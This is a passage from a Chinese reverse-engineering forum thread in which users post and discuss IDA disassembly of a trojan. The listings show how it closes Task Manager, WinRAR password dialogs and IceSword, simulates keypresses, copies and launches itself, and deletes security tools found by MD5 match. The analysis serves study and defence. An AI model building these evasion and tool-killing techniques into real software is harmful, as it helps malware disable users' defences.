能力值:
( LV2,RANK:10 )
|
-
-
26 楼
楼主很强啊。收藏学习。。。
|
能力值:
( LV8,RANK:130 )
|
-
-
27 楼
好文章,学习ing
|
能力值:
( LV2,RANK:10 )
|
-
-
28 楼
慢慢学习中 争取早日进步
|
能力值:
( LV13,RANK:420 )
|
-
-
29 楼
病毒的名字叫什么,我点了,
|
能力值:
( LV2,RANK:10 )
|
-
-
30 楼
这一段:
seg001:00409D02 call sub_408150
seg001:00409D02
......
seg001:00409DF9 push 4 ; dwFlags
seg001:00409DFB push 0 ; lpNewFileName
seg001:00409DFD lea eax, [ebp+var_28C]
seg001:00409E03 call GetSystemDirectory
seg001:00409E03
seg001:00409E08 lea eax, [ebp+var_28C]
seg001:00409E0E mov edx, offset s_Ravext_dll ; "RavExt.dll"
可是在我的IDA上显示的是
seg000:00409D02 call sub_408150
seg000:00409D07 push 4 ; lpNewFileName
seg000:00409D09 lea eax, [ebp+var_270]
seg000:00409D0F call sub_406BF4
seg000:00409D14 push [ebp+var_270]
seg000:00409D1A mov eax, off_413514
seg000:00409D1F push dword ptr [eax]
seg000:00409D21 push offset dword_40A868
seg000:00409D26 lea eax, [ebp+var_26C]
seg000:00409D2C mov edx, 3
seg000:00409D31 call sub_403E0C
seg000:00409D36 mov eax, [ebp+var_26C]
seg000:00409D3C call sub_403F4C
seg000:00409D41 push eax
seg000:00409D42 lea eax, [ebp+var_278]
seg000:00409D48 call sub_406D94
seg000:00409D4D push [ebp+var_278]
seg000:00409D53 mov eax, off_413594
seg000:00409D58 push dword ptr [eax]
seg000:00409D5A push offset dword_40A878
seg000:00409D5F lea eax, [ebp+var_274]
seg000:00409D65 mov edx, 3
seg000:00409D6A call sub_403E0C
seg000:00409D6F mov eax, [ebp+var_274]
seg000:00409D75 call sub_403F4C
seg000:00409D7A push eax ; lpExistingFileName
seg000:00409D7B call MoveFileExA
seg000:00409D80 push 4 ; dwFlags
seg000:00409D82 lea eax, [ebp+lpNewFileName]
seg000:00409D88 call sub_406C98
seg000:00409D8D push [ebp+lpNewFileName] ; lpNewFileName
seg000:00409D93 mov eax, off_41356C
seg000:00409D98 push dword ptr [eax]
seg000:00409D9A push offset dword_40A868
seg000:00409D9F lea eax, [ebp+var_27C]
seg000:00409DA5 mov edx, 3
seg000:00409DAA call sub_403E0C
seg000:00409DAF mov eax, [ebp+var_27C]
seg000:00409DB5 call sub_403F4C
seg000:00409DBA push eax
seg000:00409DBB lea eax, [ebp+var_288]
seg000:00409DC1 call sub_406D94
seg000:00409DC6 push [ebp+var_288]
seg000:00409DCC mov eax, off_413594
seg000:00409DD1 push dword ptr [eax]
seg000:00409DD3 push offset dword_40A888
seg000:00409DD8 lea eax, [ebp+var_284]
seg000:00409DDE mov edx, 3
seg000:00409DE3 call sub_403E0C
seg000:00409DE8 mov eax, [ebp+var_284]
seg000:00409DEE call sub_403F4C
seg000:00409DF3 push eax ; lpExistingFileName
seg000:00409DF4 call MoveFileExA
seg000:00409DF9 push 4 ; dwFlags
seg000:00409DFB push 0 ; lpNewFileName
seg000:00409DFD lea eax, [ebp+var_28C]
seg000:00409E03 call sub_406D94
和楼主的不一样,是什么原因啊?
另外楼主的这一段:
seg001:00409E0E mov edx, offset s_Ravext_dll ; "RavExt.dll"
在我的IDA上显示就是:
seg000:00409E0E mov edx, offset dword_40A908
我想请问offset s_Ravext_dll是怎么从dword_40A908得到的?
麻烦你了。
|
能力值:
( LV13,RANK:420 )
|
-
-
31 楼
给我一个没有壳的
|
能力值:
( LV13,RANK:420 )
|
-
-
32 楼
找到一个 seg000:0040F1AC ; =============== S U B R O U T I N E =======================================
seg000:0040F1AC
seg000:0040F1AC
seg000:0040F1AC sub_40F1AC proc near ; CODE XREF: sub_40F2EC+A35�p
seg000:0040F1AC
seg000:0040F1AC hWnd = dword ptr -18h
seg000:0040F1AC var_14 = dword ptr -14h
seg000:0040F1AC
seg000:0040F1AC push ebx
seg000:0040F1AD push esi
seg000:0040F1AE push edi
seg000:0040F1AF push ebp
seg000:0040F1B0 add esp, 0FFFFFFF8h
seg000:0040F1B3 push 0 ; lpWindowName
seg000:0040F1B5 push offset aWinrarwindow ; "WinRarWindow"
seg000:0040F1BA call FindWindowA
seg000:0040F1BF mov ebx, eax
seg000:0040F1C1 push offset aFII ; "输入密码"
seg000:0040F1C6 push offset a32770 ; "#32770"
seg000:0040F1CB call FindWindowA
seg000:0040F1D0 mov esi, eax
seg000:0040F1D2 push offset aFIA ; "輸入密碼"
seg000:0040F1D7 push offset a32770 ; "#32770"
seg000:0040F1DC call FindWindowA
seg000:0040F1E1 mov edi, eax
seg000:0040F1E3 push offset aIFII ; "请输入密码"
seg000:0040F1E8 push offset a32770 ; "#32770"
seg000:0040F1ED call FindWindowA
seg000:0040F1F2 mov ebp, eax
seg000:0040F1F4 push offset aIFIA ; "請輸入密碼"
seg000:0040F1F9 push offset a32770 ; "#32770"
seg000:0040F1FE call FindWindowA
seg000:0040F203 mov [esp+18h+hWnd], eax
seg000:0040F206 push offset aEnterPassword ; "Enter password"
seg000:0040F20B push offset a32770 ; "#32770"
seg000:0040F210 call FindWindowA
seg000:0040F215 mov [esp+18h+var_14], eax
seg000:0040F219 test ebx, ebx
seg000:0040F21B jz short loc_40F22D
seg000:0040F21D test esi, esi
seg000:0040F21F jz short loc_40F22D
seg000:0040F221 push 0 ; lParam
seg000:0040F223 push 0 ; wParam
seg000:0040F225 push 10h ; Msg
seg000:0040F227 push esi ; hWnd
seg000:0040F228 call PostMessageA
seg000:0040F22D
seg000:0040F22D loc_40F22D: ; CODE XREF: sub_40F1AC+6F�j
seg000:0040F22D ; sub_40F1AC+73�j
seg000:0040F22D test ebx, ebx
seg000:0040F22F jz short loc_40F241
seg000:0040F231 test edi, edi
seg000:0040F233 jz short loc_40F241
seg000:0040F235 push 0 ; lParam
seg000:0040F237 push 0 ; wParam
seg000:0040F239 push 10h ; Msg
seg000:0040F23B push edi ; hWnd
seg000:0040F23C call PostMessageA
seg000:0040F241
seg000:0040F241 loc_40F241: ; CODE XREF: sub_40F1AC+83�j
seg000:0040F241 ; sub_40F1AC+87�j
seg000:0040F241 test ebx, ebx
seg000:0040F243 jz short loc_40F255
seg000:0040F245 test ebp, ebp
seg000:0040F247 jz short loc_40F255
seg000:0040F249 push 0 ; lParam
seg000:0040F24B push 0 ; wParam
seg000:0040F24D push 10h ; Msg
seg000:0040F24F push ebp ; hWnd
seg000:0040F250 call PostMessageA
seg000:0040F255
seg000:0040F255 loc_40F255: ; CODE XREF: sub_40F1AC+97�j
seg000:0040F255 ; sub_40F1AC+9B�j
seg000:0040F255 test ebx, ebx
seg000:0040F257 jz short loc_40F26F
seg000:0040F259 cmp [esp+18h+hWnd], 0
seg000:0040F25D jz short loc_40F26F
seg000:0040F25F push 0 ; lParam
seg000:0040F261 push 0 ; wParam
seg000:0040F263 push 10h ; Msg
seg000:0040F265 mov eax, [esp+24h+hWnd]
seg000:0040F269 push eax ; hWnd
seg000:0040F26A call PostMessageA
seg000:0040F26F
seg000:0040F26F loc_40F26F: ; CODE XREF: sub_40F1AC+AB�j
seg000:0040F26F ; sub_40F1AC+B1�j
seg000:0040F26F test ebx, ebx
seg000:0040F271 jz short loc_40F28A
seg000:0040F273 cmp [esp+18h+var_14], 0
seg000:0040F278 jz short loc_40F28A
seg000:0040F27A push 0 ; lParam
seg000:0040F27C push 0 ; wParam
seg000:0040F27E push 10h ; Msg
seg000:0040F280 mov eax, [esp+24h+var_14]
seg000:0040F284 push eax ; hWnd
seg000:0040F285 call PostMessageA
seg000:0040F28A
seg000:0040F28A loc_40F28A: ; CODE XREF: sub_40F1AC+C5�j
seg000:0040F28A ; sub_40F1AC+CC�j
seg000:0040F28A pop ecx
seg000:0040F28B pop edx
seg000:0040F28C pop ebp
seg000:0040F28D pop edi
seg000:0040F28E pop esi
seg000:0040F28F pop ebx
seg000:0040F290 retn
seg000:0040F290 sub_40F1AC endp
如果发现WINRAR的设置密码窗口,就关闭
|
能力值:
( LV13,RANK:420 )
|
-
-
33 楼
找不到如何终结冰刃的
|
能力值:
( LV13,RANK:420 )
|
-
-
34 楼
seg000:0040C372 push 0 ; lParam
seg000:0040C374 push 0 ; wParam
seg000:0040C376 push 10h ; Msg
seg000:0040C378 push offset WindowName ; "Windows 任?
seg000:0040C37D push offset a32770_0 ; "#32770"
seg000:0040C382 call FindWindowA
seg000:0040C387 push eax ; hWnd
seg000:0040C388 call PostMessageA
如果发现有任务管理器,就将其关闭
|
能力值:
( LV2,RANK:140 )
|
-
-
35 楼
真勤奋啊~~~
这么晚了还在弄!
|
能力值:
( LV2,RANK:10 )
|
-
-
38 楼
太精彩了~~
|
能力值:
( LV2,RANK:10 )
|
-
-
39 楼
这里是不是终结冰刃的?
seg000:0040C470 ; =============== S U B R O U T I N E =======================================
seg000:0040C470
seg000:0040C470 ; Attributes: bp-based frame
seg000:0040C470
seg000:0040C470 sub_40C470 proc near ; DATA XREF: seg000:00412283�o
seg000:0040C470
seg000:0040C470 var_18 = dword ptr -18h
seg000:0040C470 var_14 = dword ptr -14h
seg000:0040C470 var_10 = dword ptr -10h
seg000:0040C470 var_C = dword ptr -0Ch
seg000:0040C470 var_8 = dword ptr -8
seg000:0040C470 var_4 = dword ptr -4
seg000:0040C470
seg000:0040C470 push ebp
seg000:0040C471 mov ebp, esp
seg000:0040C473 xor ecx, ecx
seg000:0040C475 push ecx
seg000:0040C476 push ecx
seg000:0040C477 push ecx
seg000:0040C478 push ecx
seg000:0040C479 push ecx
seg000:0040C47A push ecx
seg000:0040C47B push ebx
seg000:0040C47C push esi
seg000:0040C47D push edi
seg000:0040C47E xor eax, eax
seg000:0040C480 push ebp
seg000:0040C481 push offset loc_40C5DF
seg000:0040C486 push dword ptr fs:[eax]
seg000:0040C489 mov fs:[eax], esp
seg000:0040C48C xor eax, eax
seg000:0040C48E push ebp
seg000:0040C48F push offset loc_40C5BA
seg000:0040C494 push dword ptr fs:[eax]
seg000:0040C497 mov fs:[eax], esp
seg000:0040C49A push offset aIcesword ; "IceSword"
seg000:0040C49F push 0 ; lpClassName
seg000:0040C4A1 call FindWindowA
seg000:0040C4A6 mov edx, off_4134E8
seg000:0040C4AC mov [edx], eax
seg000:0040C4AE mov eax, off_4134E8
seg000:0040C4B3 cmp dword ptr [eax], 0
seg000:0040C4B6 jz short loc_40C4EC
seg000:0040C4B8 push 0 ; lParam
seg000:0040C4BA push 0 ; wParam
seg000:0040C4BC push 12h ; Msg
seg000:0040C4BE mov eax, off_4134E8
seg000:0040C4C3 mov eax, [eax]
seg000:0040C4C5 push eax ; hWnd
seg000:0040C4C6 call PostMessageA
seg000:0040C4CB push 64h ; dwMilliseconds
seg000:0040C4CD call Sleep
seg000:0040C4D2 push 0 ; dwExtraInfo
seg000:0040C4D4 push 0 ; dwFlags
seg000:0040C4D6 push 0 ; bScan
seg000:0040C4D8 push 0Dh ; bVk
seg000:0040C4DA call keybd_event
seg000:0040C4DF push 0 ; dwExtraInfo
seg000:0040C4E1 push 2 ; dwFlags
seg000:0040C4E3 push 0 ; bScan
seg000:0040C4E5 push 0Dh ; bVk
seg000:0040C4E7 call keybd_event
seg000:0040C4EC
seg000:0040C4EC loc_40C4EC: ; CODE XREF: sub_40C470+46�j
seg000:0040C4EC lea eax, [ebp+var_8]
seg000:0040C4EF call sub_406D94
seg000:0040C4F4 push [ebp+var_8]
seg000:0040C4F7 mov eax, off_413514
seg000:0040C4FC push dword ptr [eax]
seg000:0040C4FE push offset dword_40C604
seg000:0040C503 lea eax, [ebp+var_4]
seg000:0040C506 mov edx, 3
seg000:0040C50B call sub_403E0C
seg000:0040C510 mov eax, [ebp+var_4]
seg000:0040C513 call sub_406F54
seg000:0040C518 test al, al
seg000:0040C51A jnz loc_40C5B0
seg000:0040C520 push 0 ; lParam
seg000:0040C522 push 0 ; wParam
seg000:0040C524 push 10h ; Msg
seg000:0040C526 push offset aWindows_0 ; "Windows 任?
seg000:0040C52B push offset a32770_1 ; "#32770"
seg000:0040C530 call FindWindowA
seg000:0040C535 push eax ; hWnd
seg000:0040C536 call PostMessageA
seg000:0040C53B push 0FFFFFFFFh ; bFailIfExists
seg000:0040C53D lea eax, [ebp+var_10]
seg000:0040C540 call sub_406D94
seg000:0040C545 push [ebp+var_10]
seg000:0040C548 mov eax, off_413514
seg000:0040C54D push dword ptr [eax]
seg000:0040C54F push offset dword_40C604
seg000:0040C554 lea eax, [ebp+var_C]
seg000:0040C557 mov edx, 3
seg000:0040C55C call sub_403E0C
seg000:0040C561 mov eax, [ebp+var_C]
seg000:0040C564 call sub_403F4C
seg000:0040C569 push eax ; lpNewFileName
seg000:0040C56A mov eax, off_413568
seg000:0040C56F mov eax, [eax]
seg000:0040C571 call sub_403F4C
seg000:0040C576 push eax ; lpExistingFileName
seg000:0040C577 call CopyFileA
seg000:0040C57C push 1 ; uCmdShow
seg000:0040C57E lea eax, [ebp+var_18]
seg000:0040C581 call sub_406D94
seg000:0040C586 push [ebp+var_18]
seg000:0040C589 mov eax, off_413514
seg000:0040C58E push dword ptr [eax]
seg000:0040C590 push offset dword_40C604
seg000:0040C595 lea eax, [ebp+var_14]
seg000:0040C598 mov edx, 3
seg000:0040C59D call sub_403E0C
seg000:0040C5A2 mov eax, [ebp+var_14]
seg000:0040C5A5 call sub_403F4C
seg000:0040C5AA push eax ; lpCmdLine
seg000:0040C5AB call WinExec
seg000:0040C5B0
seg000:0040C5B0 loc_40C5B0: ; CODE XREF: sub_40C470+AA�j
seg000:0040C5B0 xor eax, eax
seg000:0040C5B2 pop edx
seg000:0040C5B3 pop ecx
seg000:0040C5B4 pop ecx
seg000:0040C5B5 mov fs:[eax], edx
seg000:0040C5B8 jmp short loc_40C5C4
seg000:0040C5BA ; ---------------------------------------------------------------------------
seg000:0040C5BA
seg000:0040C5BA loc_40C5BA: ; DATA XREF: sub_40C470+1F�o
seg000:0040C5BA jmp loc_403538
seg000:0040C5BF ; ---------------------------------------------------------------------------
seg000:0040C5BF call sub_4036F0
seg000:0040C5C4
seg000:0040C5C4 loc_40C5C4: ; CODE XREF: sub_40C470+148�j
seg000:0040C5C4 xor eax, eax
seg000:0040C5C6 pop edx
seg000:0040C5C7 pop ecx
seg000:0040C5C8 pop ecx
seg000:0040C5C9 mov fs:[eax], edx
seg000:0040C5CC push offset loc_40C5E6
seg000:0040C5D1
seg000:0040C5D1 loc_40C5D1: ; CODE XREF: sub_40C470+174�j
seg000:0040C5D1 lea eax, [ebp+var_18]
seg000:0040C5D4 mov edx, 6
seg000:0040C5D9 call sub_403BEC
seg000:0040C5DE retn
seg000:0040C5DF ; ---------------------------------------------------------------------------
seg000:0040C5DF
seg000:0040C5DF loc_40C5DF: ; DATA XREF: sub_40C470+11�o
seg000:0040C5DF jmp loc_403664
seg000:0040C5E4 ; ---------------------------------------------------------------------------
seg000:0040C5E4 jmp short loc_40C5D1
seg000:0040C5E6 ; ---------------------------------------------------------------------------
seg000:0040C5E6
seg000:0040C5E6 loc_40C5E6: ; CODE XREF: sub_40C470+16E�j
seg000:0040C5E6 ; DATA XREF: sub_40C470+15C�o
seg000:0040C5E6 pop edi
seg000:0040C5E7 pop esi
seg000:0040C5E8 pop ebx
seg000:0040C5E9 mov esp, ebp
seg000:0040C5EB pop ebp
seg000:0040C5EC retn 10h
seg000:0040C5EC sub_40C470 endp
seg000:0040C5EC
seg000:0040C5EC ; ----------------------------------------------------------------
|
能力值:
( LV13,RANK:420 )
|
-
-
40 楼
应该不是吧。冰刃的类名和标题都是随机的,而且,代码后面应该会有一个模拟点击"是"按钮的操作,可是代码中没有
|
能力值:
( LV13,RANK:420 )
|
-
-
41 楼
seg001:0040DB5D push 1 ; lParam
seg001:0040DB5F push 0F060h ; wParam
seg001:0040DB64 push 112h ; Msg
seg001:0040DB69 push ebx ; hWnd
seg001:0040DB6A call SendMessageA
这个是让窗口最小化么?为什么我用C++写出来的没有实现
|
能力值:
( LV9,RANK:680 )
|
-
-
42 楼
窗口最小化应该是映射键盘的Win+M
seg001:004112DC push 0 ; dwExtraInfo
seg001:004112DE push 0 ; dwFlags
seg001:004112E0 push 0 ; uMapType
seg001:004112E2 push 5Bh ; uCode 5Bh微软左徽标键
seg001:004112E4 call MapVirtualKeyA
seg001:004112E4
seg001:004112E9 push eax ; bScan
seg001:004112EA push 5Bh ; bVk
seg001:004112EC call keybd_event
seg001:004112EC
seg001:004112F1 push 0 ; dwExtraInfo
seg001:004112F3 push 0 ; dwFlags
seg001:004112F5 push 0 ; uMapType
seg001:004112F7 push 4Dh ; uCode 4Dh是"M"
seg001:004112F9 call MapVirtualKeyA
......
其次,该木马对付Wsys和冰刃等工具,主要是通过MD5特征码查对整个硬盘中的exe文件,若找到和木马预设的MD5相同的exe文件,则说明是冰刃,强制删除 
|
能力值:
( LV2,RANK:10 )
|
-
-
43 楼
好文章,学习ing
|
能力值:
( LV2,RANK:10 )
|
-
-
44 楼
每次分析木马和病毒, 都对系统产生了进一步了解, 感叹啊
|
能力值:
( LV2,RANK:10 )
|
-
-
45 楼
模拟键盘按键卸载杀软,想法真有意思
|
能力值:
( LV3,RANK:20 )
|
-
-
46 楼
牛,非常牛。
|
能力值:
( LV13,RANK:350 )
|
-
-
47 楼
很想啊,木马我一直都是很有兴趣的啊
|
能力值:
( LV2,RANK:10 )
|
-
-
48 楼
的却是好文章
|
能力值:
( LV2,RANK:10 )
|
-
-
49 楼
很好很强大。。。。。
|
能力值:
( LV2,RANK:10 )
|
-
-
50 楼
瑞星真的要下课了。
|
|
|
|
